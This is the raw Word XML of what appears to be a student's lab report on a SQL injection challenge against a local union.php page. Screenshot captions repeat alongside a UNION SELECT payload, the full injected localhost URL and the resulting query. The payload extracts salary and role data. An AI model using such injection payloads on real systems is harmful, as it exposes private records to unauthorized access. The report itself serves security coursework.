                <wp:docPr id="23" name="Metin Kutusu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18E635" w14:textId="164FD1F1" w:rsidR="00B90F0C" w:rsidRPr="00B90F0C" w:rsidRDefault="00B90F0C" w:rsidP="00B90F0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6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(for the case where the username = jack)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93B0F" id="Metin Kutusu 23" o:spid="_x0000_s1036" type="#_x0000_t202" style="position:absolute;margin-left:-62.65pt;margin-top:690.75pt;width:572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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5918E635" w14:textId="164FD1F1" w:rsidR="00B90F0C" w:rsidRPr="00B90F0C" w:rsidRDefault="00B90F0C" w:rsidP="00B90F0C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</w:t>
                      </w:r>
                      <w:r>
                        <w:t>6</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B90F0C">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>(for the case where the username = jack)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B90F0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31933A" wp14:editId="33B4909B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-799686</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3374215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7264400" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="21" name="Metin Kutusu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538A23" w14:textId="0F35D662" w:rsidR="00B90F0C" w:rsidRPr="00B90F0C" w:rsidRDefault="00B90F0C" w:rsidP="00B90F0C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5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(for the case where the username = jack)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1933A" id="Metin Kutusu 21" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;margin-left:-62.95pt;margin-top:265.7pt;width:57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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="08538A23" w14:textId="0F35D662" w:rsidR="00B90F0C" w:rsidRPr="00B90F0C" w:rsidRDefault="00B90F0C" w:rsidP="00B90F0C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5 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B90F0C">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>(for the case where the username = jack)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B90F0C">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEF59D5" w14:textId="2409B878" w:rsidR="00AA1212" w:rsidRDefault="00AA1212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0A557133" wp14:editId="3F17F4BB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-764371</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-778295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7256477" cy="4541697"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapNone/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477" cy="454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AAE57" w14:textId="5DE7E627" w:rsidR="00AA1212" w:rsidRDefault="00560F06">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21335549" wp14:editId="5B5FD7BF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-765571</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3955932</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7213597" cy="4848837"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:wrapNone/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090" cy="4853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21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B64356" wp14:editId="0F477638">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-770255</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>8895080</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7264400" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="28" name="Metin Kutusu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25B42C" w14:textId="376EC76C" w:rsidR="00AA1212" w:rsidRPr="00B90F0C" w:rsidRDefault="00AA1212" w:rsidP="00AA1212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8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 xml:space="preserve">(for the case where the username = </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>lord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B64356" id="Metin Kutusu 28" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;margin-left:-60.65pt;margin-top:700.4pt;width:57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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7B25B42C" w14:textId="376EC76C" w:rsidR="00AA1212" w:rsidRPr="00B90F0C" w:rsidRDefault="00AA1212" w:rsidP="00AA1212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>Fourth</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">Challenge Screenshot </w:t>
                      </w:r>
                      <w:r>
                        <w:t>8</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B90F0C">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">(for the case where the username = </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>lord</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B90F0C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A121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F3365D9" wp14:editId="5C8A121B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-764289</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3661364</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7264400" cy="192947"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26" name="Metin Kutusu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19294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5BE70" w14:textId="67232E41" w:rsidR="00AA1212" w:rsidRPr="00B90F0C" w:rsidRDefault="00AA1212" w:rsidP="00AA1212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7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 xml:space="preserve">(for the case where the username = </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>lord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365D9" id="Metin Kutusu 26" o:spid="_x0000_s1039" type="#_x0000_t202" style="position:absolute;margin-left:-60.2pt;margin-top:288.3pt;width:572pt;height:15.2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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="14A5BE70" w14:textId="67232E41" w:rsidR="00AA1212" w:rsidRPr="00B90F0C" w:rsidRDefault="00AA1212" w:rsidP="00AA1212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</w:t>
                      </w:r>
                      <w:r>
                        <w:t>7</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B90F0C">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">(for the case where the username = </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>lord</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B90F0C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AA1212">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A26B2E" w14:textId="06034788" w:rsidR="001D74DA" w:rsidRDefault="00560F06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A54446D" wp14:editId="25E42009">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-799128</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-740404</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7239699" cy="4528004"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="30" name="Resim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 descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu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040" cy="4537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1350D" w14:textId="3CE40539" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="538DAD02" w14:textId="5B20566C" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="28D68B99" w14:textId="2CEB4B8E" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="7000772E" w14:textId="599539EA" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="75B0EECE" w14:textId="785822D5" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="14F026DF" w14:textId="0A31CEB5" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="6A54E48E" w14:textId="55D0FE31" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="4DB47923" w14:textId="0B65B1AC" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="29B6D674" w14:textId="2CA4D506" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="57DDCAF8" w14:textId="72C061F5" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="597AFA59" w14:textId="7865A91E" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="6CC53664" w14:textId="64C48327" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="61E84D80" w14:textId="4F49A9C4" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="0E1B2AE3" w14:textId="434904CE" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="634A3178" w14:textId="3058B23E" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="54323A8D" w14:textId="25FD1741" w:rsidR="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
    <w:p w14:paraId="3EE1C79A" w14:textId="77777777" w:rsidR="00560F06" w:rsidRDefault="00560F06" w:rsidP="00B13699">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56765318" w14:textId="5F6BA0D7" w:rsidR="00560F06" w:rsidRDefault="00560F06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B11EC8" wp14:editId="78E4A486">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-857588</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>816843</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7239635" cy="5201174"/>
                <wp:effectExtent l="0" t="0" r="12065" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="29" name="Metin Kutus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635" cy="52011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E32C90" w14:textId="705637B2" w:rsidR="00560F06" w:rsidRPr="00560F06" w:rsidRDefault="00560F06" w:rsidP="00B13699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560F06">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t>EXPLANATION ABOUT THE FOURTH CHALLENGE</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="59183C73" w14:textId="77777777" w:rsidR="00560F06" w:rsidRDefault="00560F06" w:rsidP="00B1369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28F0F138" w14:textId="20A3C2B3" w:rsidR="00560F06" w:rsidRDefault="00B13699" w:rsidP="00B13699">
                            <w:r w:rsidRPr="00B13699">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>Full Localhost Link I used in the fourth challenge:</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6D28521E" w14:textId="2007210F" w:rsidR="00560F06" w:rsidRPr="00FA1E79" w:rsidRDefault="00FA1E79" w:rsidP="00B13699">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                            </w:pPr>
                            <w:hyperlink r:id="rId18" w:history="1">
                              <w:r w:rsidRPr="00FA1E79">
                                <w:rPr>
                                  <w:rStyle w:val="Kpr"/>
                                  <w:rFonts w:cstheme="minorHAnsi"/>
                                  <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                                  <w:u w:val="none"/>
                                  <w:lang w:val="tr-TR"/>
                                </w:rPr>
                                <w:t>http://localhost/union.php?username=admin%27%20UNION%20SELECT%20NULL,%20S.ID,%20NULL,%20S.Role,%20S.Salary,%20NULL,%20NULL%20FROM%20users%20U%20JOIN%20salaries%20S%20ON%20(U.id=S.userid)%20WHERE%20S.salary%20%3E%2012000%20AND%20S.age%20%3E%2040%20--</w:t>
                              </w:r>
                            </w:hyperlink>
                          </w:p>
                          <w:p w14:paraId="7E5A4D2A" w14:textId="77777777" w:rsidR="00FA1E79" w:rsidRDefault="00FA1E79" w:rsidP="00B13699"/>
                          <w:p w14:paraId="14A01680" w14:textId="45710214" w:rsidR="00560F06" w:rsidRDefault="00B13699" w:rsidP="00B1369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Payload</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B13699">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve"> I used in the fourth challenge:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="152414E8" w14:textId="6BA26059" w:rsidR="00FA1E79" w:rsidRDefault="00FA1E79" w:rsidP="00FA1E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UNION SELECT NULL, S.ID, NULL, </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:proofErr w:type="gram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S.Role</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gram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NULL, NULL FROM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U JOIN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S ON (U.id=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) WHERE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&gt; 12000 AND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S.age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&gt; 40 </w:t>
                            </w:r>
                            <w:r w:rsidR="004E66D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--</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5152F72B" w14:textId="64B02C2B" w:rsidR="004E66DB" w:rsidRDefault="004E66DB" w:rsidP="00FA1E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</w:p>
                          <w:p w14:paraId="589D851E" w14:textId="72E536DB" w:rsidR="004E66DB" w:rsidRDefault="004E66DB" w:rsidP="00FA1E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</w:pPr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My </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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within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f</w:t>
                            </w:r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ull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l</w:t>
                            </w:r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ocalhost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l</w:t>
                            </w:r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ink I </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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Pr="004E66D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:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2052C795" w14:textId="22BF50BC" w:rsidR="004E66DB" w:rsidRPr="004E66DB" w:rsidRDefault="004E66DB" w:rsidP="00FA1E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  <w:r w:rsidRPr="004E66D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%27%20UNION%20SELECT%</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="004E66D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20NULL,%</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="004E66DB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20S.ID,%20NULL,%20S.Role,%20S.Salary,%20NULL,%20NULL%20FROM%20users%20U%20JOIN%20salaries%20S%20ON%20(U.id=S.userid)%20WHERE%20S.salary%20%3E%2012000%20AND%20S.age%20%3E%2040%20--</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="29D6C4FB" w14:textId="2F4F9572" w:rsidR="004E66DB" w:rsidRDefault="004E66DB" w:rsidP="00FA1E79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</w:pPr>
                          </w:p>
                          <w:p w14:paraId="2E02B871" w14:textId="77777777" w:rsidR="00560F06" w:rsidRDefault="00560F06" w:rsidP="00B13699"/>
                          <w:p w14:paraId="678CB622" w14:textId="39F2DEDD" w:rsidR="00560F06" w:rsidRDefault="00560F06" w:rsidP="00B13699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Final query after I enter my payload:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="42FA4896" w14:textId="77777777" w:rsidR="00560F06" w:rsidRPr="00FA1E79" w:rsidRDefault="00560F06" w:rsidP="00560F06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SELECT </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:proofErr w:type="gram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U.username</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gram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S.* FROM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S</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="16BF773D" w14:textId="3776614B" w:rsidR="00560F06" w:rsidRPr="00FA1E79" w:rsidRDefault="00560F06" w:rsidP="00560F06">
                            <w:pPr>
                              <w:autoSpaceDE w:val="0"/>
                              <w:autoSpaceDN w:val="0"/>
                              <w:adjustRightInd w:val="0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JOIN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U ON (</w:t>
                            </w:r>
                            <w:proofErr w:type="gram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U.id=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proofErr w:type="gram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)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="18B3D759" w14:textId="4E8D22BC" w:rsidR="00560F06" w:rsidRPr="00FA1E79" w:rsidRDefault="00560F06" w:rsidP="00560F0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   WHERE S.id=0 OR </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:proofErr w:type="gram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U.username</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gram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='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admin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' UNION SELECT NULL, S.ID, NULL,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S.Role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NULL, NULL FROM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U JOIN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S ON (U.id=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) WHERE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&gt; 12000 AND </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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S.age</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00FA1E79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&gt; 40 --'</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="58DB4F34" w14:textId="47D29A67" w:rsidR="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
                          <w:p w14:paraId="757A2AD8" w14:textId="6ACAA0F8" w:rsidR="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
                          <w:p w14:paraId="7A8E37B6" w14:textId="7C0F4170" w:rsidR="00B13699" w:rsidRDefault="00B13699" w:rsidP="001E02B9">
                            <w:pPr>
                              <w:jc w:val="both"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00B13699">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">NOTE: </w:t>
                            </w:r>
                            <w:r w:rsidR="00560F06">
                              <w:t xml:space="preserve">For the fourth challenge, </w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">I have included the outputs for the options username = admin, username = jack, and username = lord. To observe outputs for </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B13699">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">username = </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00B13699">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>alex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B13699">
                              <w:t>and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username =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karen</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">, </w:t>
                            </w:r>
                            <w:r w:rsidR="001E02B9">
                              <w:t xml:space="preserve">before entering my payload to the end of the localhost URL, </w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">you can change the part which comes right after the “username=” part in the localhost link to the </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00B13699">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>alex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B13699">
                              <w:t>and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karen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Pr="00B13699">
                              <w:t>respectively</w:t>
                            </w:r>
                            <w:r>
                              <w:t>.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="09DBD74C" w14:textId="51DF2546" w:rsidR="00560F06" w:rsidRDefault="00560F06" w:rsidP="00B13699"/>
                          <w:p w14:paraId="78A5BDC7" w14:textId="77777777" w:rsidR="00560F06" w:rsidRPr="00B13699" w:rsidRDefault="00560F06" w:rsidP="00B13699"/>
                          <w:p w14:paraId="47C35F59" w14:textId="77777777" w:rsidR="00B13699" w:rsidRDefault="00B13699"/>
                          <w:p w14:paraId="350F6544" w14:textId="77777777" w:rsidR="00B13699" w:rsidRDefault="00B136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11EC8" id="Metin Kutusu 29" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;margin-left:-67.55pt;margin-top:64.3pt;width:570.05pt;height:409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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4FE32C90" w14:textId="705637B2" w:rsidR="00560F06" w:rsidRPr="00560F06" w:rsidRDefault="00560F06" w:rsidP="00B13699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560F06">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:u w:val="single"/>
                        </w:rPr>
                        <w:t>EXPLANATION ABOUT THE FOURTH CHALLENGE</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="59183C73" w14:textId="77777777" w:rsidR="00560F06" w:rsidRDefault="00560F06" w:rsidP="00B13699">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="28F0F138" w14:textId="20A3C2B3" w:rsidR="00560F06" w:rsidRDefault="00B13699" w:rsidP="00B13699">
                      <w:r w:rsidRPr="00B13699">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>Full Localhost Link I used in the fourth challenge:</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6D28521E" w14:textId="2007210F" w:rsidR="00560F06" w:rsidRPr="00FA1E79" w:rsidRDefault="00FA1E79" w:rsidP="00B13699">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                      </w:pPr>
                      <w:hyperlink r:id="rId19" w:history="1">
                        <w:r w:rsidRPr="00FA1E79">
                          <w:rPr>
                            <w:rStyle w:val="Kpr"/>
                            <w:rFonts w:cstheme="minorHAnsi"/>
                            <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                            <w:u w:val="none"/>
                            <w:lang w:val="tr-TR"/>
                          </w:rPr>
                          <w:t>http://localhost/union.php?username=admin%27%20UNION%20SELECT%20NULL,%20S.ID,%20NULL,%20S.Role,%20S.Salary,%20NULL,%20NULL%20FROM%20users%20U%20JOIN%20salaries%20S%20ON%20(U.id=S.userid)%20WHERE%20S.salary%20%3E%2012000%20AND%20S.age%20%3E%2040%20--</w:t>
                        </w:r>
                      </w:hyperlink>
                    </w:p>
                    <w:p w14:paraId="7E5A4D2A" w14:textId="77777777" w:rsidR="00FA1E79" w:rsidRDefault="00FA1E79" w:rsidP="00B13699"/>
                    <w:p w14:paraId="14A01680" w14:textId="45710214" w:rsidR="00560F06" w:rsidRDefault="00B13699" w:rsidP="00B1369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Payload</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B13699">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve"> I used in the fourth challenge:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="152414E8" w14:textId="6BA26059" w:rsidR="00FA1E79" w:rsidRDefault="00FA1E79" w:rsidP="00FA1E79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'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UNION SELECT NULL, S.ID, NULL, </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gram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S.Role</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gram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NULL, NULL FROM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U JOIN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S ON (U.id=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) WHERE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&gt; 12000 AND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S.age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&gt; 40 </w:t>
                      </w:r>
                      <w:r w:rsidR="004E66DB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--</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5152F72B" w14:textId="64B02C2B" w:rsidR="004E66DB" w:rsidRDefault="004E66DB" w:rsidP="00FA1E79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</w:p>
                    <w:p w14:paraId="589D851E" w14:textId="72E536DB" w:rsidR="004E66DB" w:rsidRDefault="004E66DB" w:rsidP="00FA1E79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</w:pPr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My </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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within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f</w:t>
                      </w:r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ull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l</w:t>
                      </w:r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ocalhost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l</w:t>
                      </w:r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ink I </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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Pr="004E66DB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:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2052C795" w14:textId="22BF50BC" w:rsidR="004E66DB" w:rsidRPr="004E66DB" w:rsidRDefault="004E66DB" w:rsidP="00FA1E79">
                      <w:p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  <w:r w:rsidRPr="004E66DB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%27%20UNION%20SELECT%</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="004E66DB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20NULL,%</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="004E66DB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20S.ID,%20NULL,%20S.Role,%20S.Salary,%20NULL,%20NULL%20FROM%20users%20U%20JOIN%20salaries%20S%20ON%20(U.id=S.userid)%20WHERE%20S.salary%20%3E%2012000%20AND%20S.age%20%3E%2040%20--</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="29D6C4FB" w14:textId="2F4F9572" w:rsidR="004E66DB" w:rsidRDefault="004E66DB" w:rsidP="00FA1E79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</w:pPr>
                    </w:p>
                    <w:p w14:paraId="2E02B871" w14:textId="77777777" w:rsidR="00560F06" w:rsidRDefault="00560F06" w:rsidP="00B13699"/>
                    <w:p w14:paraId="678CB622" w14:textId="39F2DEDD" w:rsidR="00560F06" w:rsidRDefault="00560F06" w:rsidP="00B13699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Final query after I enter my payload:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="42FA4896" w14:textId="77777777" w:rsidR="00560F06" w:rsidRPr="00FA1E79" w:rsidRDefault="00560F06" w:rsidP="00560F06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SELECT </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gram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U.username</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gram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S.* FROM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S</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="16BF773D" w14:textId="3776614B" w:rsidR="00560F06" w:rsidRPr="00FA1E79" w:rsidRDefault="00560F06" w:rsidP="00560F06">
                      <w:pPr>
                        <w:autoSpaceDE w:val="0"/>
                        <w:autoSpaceDN w:val="0"/>
                        <w:adjustRightInd w:val="0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JOIN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U ON (</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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U.id=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proofErr w:type="gram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)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="18B3D759" w14:textId="4E8D22BC" w:rsidR="00560F06" w:rsidRPr="00FA1E79" w:rsidRDefault="00560F06" w:rsidP="00560F06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</w:rPr>
                      </w:pPr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   WHERE S.id=0 OR </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gram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U.username</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gram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='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admin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' UNION SELECT NULL, S.ID, NULL,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S.Role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NULL, NULL FROM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U JOIN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S ON (U.id=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) WHERE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&gt; 12000 AND </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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S.age</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00FA1E79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&gt; 40 --'</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="58DB4F34" w14:textId="47D29A67" w:rsidR="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
                    <w:p w14:paraId="757A2AD8" w14:textId="6ACAA0F8" w:rsidR="00B13699" w:rsidRDefault="00B13699" w:rsidP="00B13699"/>
                    <w:p w14:paraId="7A8E37B6" w14:textId="7C0F4170" w:rsidR="00B13699" w:rsidRDefault="00B13699" w:rsidP="001E02B9">
                      <w:pPr>
                        <w:jc w:val="both"/>
                      </w:pPr>
                      <w:r w:rsidRPr="00B13699">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">NOTE: </w:t>
